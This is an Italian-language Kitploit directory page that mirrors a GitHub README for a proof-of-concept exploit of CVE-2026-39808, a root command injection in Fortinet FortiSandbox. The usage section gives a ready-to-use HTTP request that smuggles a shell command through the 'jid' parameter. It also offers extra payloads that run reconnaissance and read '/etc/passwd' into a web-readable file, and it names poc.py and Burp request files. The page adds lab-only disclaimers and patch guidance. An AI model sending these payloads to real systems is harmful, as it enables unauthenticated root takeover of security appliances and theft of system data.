Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39808 — CVE-2026-39808 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2026-39808
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHub0xblackash/cve-2026-39808

CVE-2026-39808

CVE-2026-39808

Vedi Repository
223 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 FortiSandbox Fuga dalla Sandbox come Root - CVE-2026-39808

1765359501378
Status CVE Affected Versions

🎯 Panoramica

Questo repository contiene una Proof of Concept pulita e ben documentata per CVE-2026-39808 — una vulnerabilità critica di command injection non autenticata in Fortinet FortiSandbox che consente la fuga dalla sandbox e l'esecuzione remota di codice come root (uid=0).

Cosa dimostra questa PoC:

  • Path Traversal + Command Injection tramite il parametro jid
  • Fuga dalla sandbox dall'ambiente di analisi
  • Esecuzione di comandi arbitrari con privilegi di root
  • Lettura di file di sistema e informazioni di rete

📸 Demo

CVE-2026-39808 1 CVE-2026-39808 0 CVE-2026-39808 3 CVE-2026-39808 2 CVE-2026-39808 4

Exploit riuscito che mostra uid=0 gid=0 groups=0


🚀 Versioni Interessate

Intervallo di versioniStato
FortiSandbox 4.4.0 – 4.4.8Vulnerabile
FortiSandbox 5.0.0 – 5.0.5Vulnerabile
4.4.9+ / 5.0.6+Patchata

🛠️ Come Usare (Solo Lab)

1. Payload Semplice (Consigliato)

root@kitploit:~
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip

2. Visualizza il risultato

Apri nel browser:

root@kitploit:~
https://your-lab-ip/ng/out.txt

3. Esempi di Payload Avanzati

root@kitploit:~
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|

# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|

📁 Contenuto del Repository

  • poc.py → Exploit Python automatizzato
  • burp-request.txt → Richiesta Burp Suite pronta all'uso
  • payloads.md → Raccolta di payload utili
  • screenshots/ → Immagini dello sfruttamento passo-passo
  • README.md → Questo file

⚠️ Note Importanti

  • Solo per scopi educativi e di laboratorio
  • NON utilizzarlo su sistemi di produzione o non autorizzati
  • Ottieni sempre l'autorizzazione appropriata prima di testare
  • Applica la patch al tuo FortiSandbox portandolo alla versione 4.4.9+ o 5.0.6+

🛡️ Mitigazione

Aggiorna immediatamente FortiSandbox a una delle seguenti versioni:

  • 4.4.9 o superiore
  • 5.0.6 o superiore

Fortinet ha rilasciato patch ufficiali che risolvono questa vulnerabilità.


Realizzato per scopi di Ricerca & Apprendimento
⭐ Lascia una stella a questo repository se ti è stato utile!

Scarica lo strumento